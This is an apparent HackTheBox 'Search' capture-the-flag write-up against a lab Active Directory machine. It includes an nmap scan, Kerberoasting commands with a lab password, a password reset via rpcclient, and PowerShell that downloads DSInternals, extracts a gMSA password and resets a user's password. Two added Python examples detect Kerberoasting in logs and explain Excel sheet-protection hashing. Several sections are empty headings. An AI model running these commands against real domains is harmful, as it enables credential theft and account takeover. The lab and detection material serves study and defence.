HackTheBox-Search

NMAP

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-19 09:28:07Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8172/tcp  open  ssl/http      Microsoft IIS httpd 10.0
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  unknown
49725/tcp open  msrpc         Microsoft Windows RPC

PORT 139/445 (SMB)

PORT 80 (HTTP)

Foothold

python3 /opt/impacket/examples/GetUserSPNs.py -target-domain search.htb -request -dc-ip 10.129.247.201 -usersfile new_users.txt search.htb/hope.sharp
python3 /opt/impacket/examples/GetUserSPNs.py -request -dc-ip 10.129.247.201 search.htb/hope.sharp:"IsolationIsKey?" -outputfile hashes.kerberoast
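On the blue-team side, the GetUserSPNs request above leaves a distinctive trace on the domain controller: a burst of Event ID 4769 service-ticket requests, typically with RC4-HMAC (0x17) encryption, for several user-style service accounts from one source. The following is an added example (not code from the writeup) that runs that check over a handful of constructed 4769 records flattened to key=value lines; the user names reuse names from this box, while the service names, IP addresses and the record layout are invented for the sample.

```python
import re
from collections import defaultdict

# Constructed sample of Windows Security Event ID 4769 (Kerberos service ticket
# requested) records, flattened to key=value pairs. Illustrative only, not log
# data captured from the box. 0x17 = RC4-HMAC, 0x12 = AES256-CTS-HMAC-SHA1-96.
SAMPLE_4769 = """\
EventID=4769 TargetUserName=hope.sharp@SEARCH.HTB ServiceName=svc-web TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0
EventID=4769 TargetUserName=hope.sharp@SEARCH.HTB ServiceName=RESEARCH$ TicketEncryptionType=0x12 IpAddress=10.10.14.5 Status=0x0
EventID=4769 TargetUserName=edgar.jacobs@SEARCH.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.129.247.10 Status=0x0
EventID=4769 TargetUserName=hope.sharp@SEARCH.HTB ServiceName=svc-sql TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0
EventID=4769 TargetUserName=sierra.frye@SEARCH.HTB ServiceName=RESEARCH$ TicketEncryptionType=0x12 IpAddress=10.129.247.20 Status=0x0
EventID=4769 TargetUserName=hope.sharp@SEARCH.HTB ServiceName=svc-backup TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")
RC4_HMAC = 0x17


def parse_4769(line: str) -> dict:
    """Split one flattened 4769 record into a field dictionary."""
    return dict(FIELD_RE.findall(line))


def is_roastable_request(rec: dict) -> bool:
    """True for a successful RC4 service-ticket request against a user-style
    (non-machine) service account. Machine accounts end in '$' and krbtgt
    requests are TGT traffic, so both are excluded."""
    svc = rec.get("ServiceName", "")
    return (
        rec.get("EventID") == "4769"
        and rec.get("Status") == "0x0"
        and int(rec.get("TicketEncryptionType", "0"), 16) == RC4_HMAC
        and not svc.endswith("$")
        and svc.lower() != "krbtgt"
    )


def kerberoast_findings(log_text: str, min_services: int = 2) -> dict:
    """Group RC4 service-ticket requests by (source IP, requesting user) and
    return the groups that touched at least `min_services` distinct service
    accounts; one RC4 ticket can be legitimate, a spread of them rarely is."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_4769(line)
        if rec and is_roastable_request(rec):
            seen[(rec["IpAddress"], rec["TargetUserName"])].add(rec["ServiceName"])
    return {key: sorted(services) for key, services in seen.items()
            if len(services) >= min_services}


if __name__ == "__main__":
    for (ip, user), services in kerberoast_findings(SAMPLE_4769).items():
        print(f"possible kerberoasting from {ip} as {user}: {', '.join(services)}")
```

The RC4 indicator is the classic one, but an attacker can request AES tickets for accounts that support them, so the "many distinct service accounts from one principal in a short window" heuristic matters more than the encryption type alone; a decoy account with an SPN that nothing legitimately requests is a cheap complement.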

Privilege Escalation (Edgar.Jacobs)

Privilege Escalation (Sierra.Frye)

</sheetData><sheetProtection algorithmName="SHA-512" hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg==" saltValue="U9oZfaVCkz5jWdhs9AA8nA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
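The sheetProtection element above stores only a salted, iterated SHA-512 hash of the sheet password (the ECMA-376 scheme: hash the salt and the UTF-16LE password, then rehash with a 32-bit little-endian counter appended for spinCount rounds); Excel checks a candidate against it when a user clicks Unprotect. The cell contents in sheetData sit beside it in plaintext inside the .xlsx zip, so sheet protection is a UI lock, not confidentiality. The following added example (not code from the writeup; the salt, password and worksheet XML are constructed) implements that hash, verifies a password against the attribute set, and reads the cells straight out of the XML regardless of the protection element.

```python
import base64
import hashlib
import hmac
import os
import struct
import xml.etree.ElementTree as ET
from typing import Optional

SSML_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"


def sheet_protection_hash(password: str, salt: bytes, spin_count: int,
                          algorithm: str = "sha512") -> bytes:
    """ECMA-376 sheetProtection password hash:
    H0 = H(salt || UTF-16LE(password)); Hn = H(Hn-1 || LE32(n-1)) for spin_count rounds."""
    h = hashlib.new(algorithm, salt + password.encode("utf-16-le")).digest()
    for i in range(spin_count):
        h = hashlib.new(algorithm, h + struct.pack("<I", i)).digest()
    return h


def make_protection_attrs(password: str, spin_count: int = 100000,
                          salt: Optional[bytes] = None) -> dict:
    """Build the attribute set Excel writes into <sheetProtection>."""
    salt = os.urandom(16) if salt is None else salt
    digest = sheet_protection_hash(password, salt, spin_count)
    return {
        "algorithmName": "SHA-512",
        "hashValue": base64.b64encode(digest).decode(),
        "saltValue": base64.b64encode(salt).decode(),
        "spinCount": str(spin_count),
    }


def verify_sheet_password(password: str, attrs: dict) -> bool:
    """Check a candidate password against sheetProtection attributes (what Excel does on Unprotect)."""
    algorithm = attrs["algorithmName"].replace("-", "").lower()   # "SHA-512" -> "sha512"
    salt = base64.b64decode(attrs["saltValue"])
    expected = base64.b64decode(attrs["hashValue"])
    got = sheet_protection_hash(password, salt, int(attrs["spinCount"]), algorithm)
    return hmac.compare_digest(got, expected)


def build_sheet_xml(attrs: dict) -> str:
    """Constructed sheet1.xml: two inline cells followed by the protection element."""
    attr_text = " ".join(f'{k}="{v}"' for k, v in attrs.items())
    return (
        f'<worksheet xmlns="{SSML_NS}"><sheetData>'
        '<row r="1"><c r="A1" t="inlineStr"><is><t>hope.sharp</t></is></c>'
        '<c r="B1"><v>42</v></c></row>'
        f'</sheetData><sheetProtection {attr_text} sheet="1" objects="1" scenarios="1"/></worksheet>'
    )


def read_cells(sheet_xml: str) -> dict:
    """Return cell reference -> value straight from sheetData; protection does not encrypt these."""
    root = ET.fromstring(sheet_xml)
    cells = {}
    for cell in root.iter(f"{{{SSML_NS}}}c"):
        text = cell.find(f"{{{SSML_NS}}}is/{{{SSML_NS}}}t")
        value = cell.find(f"{{{SSML_NS}}}v")
        cells[cell.get("r")] = (text if text is not None else value).text
    return cells


if __name__ == "__main__":
    attrs = make_protection_attrs("Spring2022!", spin_count=1000)
    print("correct password verifies:", verify_sheet_password("Spring2022!", attrs))
    print("cells readable without it:", read_cells(build_sheet_xml(attrs)))
```

Anything that must stay confidential in a workbook needs the separate OOXML file-level encryption (the EncryptedPackage stream), not sheet protection; the 100000-round SHA-512 only slows guessing of the unlock password, which the data does not depend on.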

Privilege Escalation (Tristan.Davies -> Administrator)

Method 1 (unintended)

Method 2 (intended)

setuserinfo2 Tristan.Davies 23 'arzismol'

Method 3

Invoke-WebRequest -Uri http://ip/dsinternals.zip -UseBasicParsing -OutFile dsinternals.zip
Expand-Archive -Path dsinternals.zip -DestinationPath dsinternals
Import-Module .\dsinternals\DSInternals.psd1   # manifest path inside the extracted zip is assumed; adjust to where it landed
Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA$' -Properties PrincipalsAllowedToRetrieveManagedPassword
$gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA$' -Properties 'msDS-ManagedPassword'
$pt = ConvertFrom-ADManagedPasswordBlob $gmsa.'msDS-ManagedPassword'   # DSInternals cmdlet that decodes the managed-password blob into $pt
$Credential = New-Object System.Management.Automation.PSCredential 'BIR-ADFS-GMSA$',$pt.SecureCurrentPassword
Invoke-Command -ComputerName Research -Credential $Credential -ScriptBlock { whoami }
Invoke-Command -ComputerName Research -Credential $Credential -ScriptBlock { net user Tristan.Davies arzissmol }

ARZ101

Pentester | CTF Player